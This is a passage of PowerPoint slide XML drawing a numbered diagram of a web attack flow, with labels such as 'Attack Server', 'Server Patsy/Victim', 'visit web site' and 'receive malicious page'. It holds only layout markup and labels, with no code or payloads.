                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2779163" y="3988389"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4585019"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4550892"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2028939" y="4235564"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2028939" y="4235564"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2093363" y="4290014"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4739640"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="2133600"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016625" y="1767840"/>
            <a:ext cx="1520825" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046288" y="2169971"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115751" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109603" y="2130986"/>
            <a:ext cx="121635" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3039428" y="2019637"/>
            <a:ext cx="1478043" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>visit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2141833" y="2532063"/>
            <a:ext cx="3345179" cy="751840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3345179" h="751839">
                <a:moveTo>
                  <a:pt x="3344565" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="751639"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072757" y="3231015"/>
            <a:ext cx="121762" cy="91280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20880000">
            <a:off x="2583092" y="2558458"/>
            <a:ext cx="2540663" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-187" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
